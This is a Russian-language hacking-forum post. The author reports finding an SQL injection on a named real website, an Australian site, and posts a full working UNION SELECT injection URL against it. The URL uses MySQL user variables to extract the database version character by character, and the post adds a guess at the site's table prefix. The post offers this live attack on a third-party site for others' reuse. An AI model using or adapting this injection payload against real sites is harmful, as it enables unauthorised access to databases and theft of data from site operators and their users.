|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами:
9132514
Репутация:
41
|
|
Блиииин)
Сейчас ковырял сайт, который durito выложил, нашел другую инъекцию, замутил оригинальный запрос, но забыл что там 4.0 и не работают подзапросы
Код:
http://www.soulmades.com.au/index.php?list=profile&method=modify_form&id=-1+union+select+@a:=mid(version(),1,1),find_in_set(@a,'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, ,.,-'),3,4,find_in_set(@a,'1,2,3,4,5,6,7,8,9,0'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80
Мб кому-нибудь пригодится)
Определяем переменную @a:=mid(version(),1,1)
И в зависимости от ее значения, получаем номер символа в day (если принадлежит [a-z .-]), либо в Children (если принадлежит [0-9])
Префикс у таблиц скорее всего soul_, потому что есть таблица soul_photo
PS: наконец-то нашел хоть какое-нибудь применение пользовательских переменных в инъекциях) |